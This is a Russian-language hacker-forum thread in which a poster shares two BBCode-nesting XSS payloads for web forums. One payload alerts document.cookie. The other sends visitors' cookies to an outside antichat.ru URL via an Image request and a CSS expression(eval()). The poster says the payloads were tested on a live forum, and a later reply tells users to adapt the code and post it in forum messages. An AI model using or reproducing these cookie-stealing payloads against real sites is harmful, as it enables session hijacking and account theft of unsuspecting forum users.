Нашел вложеные теги, сделал видео.

1.

[еmail=[urл=s=`]a[/urл]]a[/еmail]`xss=`alert(document.cookie);this.xss=null` style=top:expression(eval(this.xss));


2.

[еmail=[urл=s=`]a[/urл]]a[/еmail]`xss=`i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null` style=top:expression(eval(this.xss));


ВНИМАНИЕ! Намеренно (чтобы теги не парсились) я написал [емейл] через _рускую_ е и url тоже через Л.
Перепешите А НЕ КОПИРУЙТЕ ТЕКСТ!

Проверялось на http://region59.com/forum - между прочим хороший варез - сайт

Блин, матерые какие-то у тебя XSS-inj.. Я ещё не проверял, но имхо можно было бы сделать и короче. Хотя, хз, посмотрим...........


Кстати, а где видео? Если записал, почему ещё не вывесил?

KEZ ты хотел сказать спаренные теги а не вложенные правда?

Нет там вложенных тегов у тебя есть спаренные. :rolleyes:

Мои теги САМЫЕ простые. Проще некуда. Теги+baclslash и все. Проше незя.
Видео сделал. Вложеные теги = спареные теги.

Видео уже вывесил.
А вот насчет тегов - там все проще некуда

Спасибо Kez. Ты дал мне ответ на одну проблемму с которой я мучился целых два дня!

Нашел вложеные теги, сделал видео.

1.

[еmail=[urл=s=`]a[/urл]]a[/еmail]`xss=`alert(document.cookie);this.xss=null` style=top:expression(eval(this.xss));


2.

[еmail=[urл=s=`]a[/urл]]a[/еmail]`xss=`i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null` style=top:expression(eval(this.xss));


ВНИМАНИЕ! Намеренно (чтобы теги не парсились) я написал [емейл] через _рускую_ е и url тоже через Л.
Перепешите А НЕ КОПИРУЙТЕ ТЕКСТ!

Проверялось на http://region59.com/forum - между прочим хороший варез - сайт
кинь пожалуйста пример как им пользоваться...заранее спасибо

Отредактируй код под нужный тебе вставь с сообщение на форуме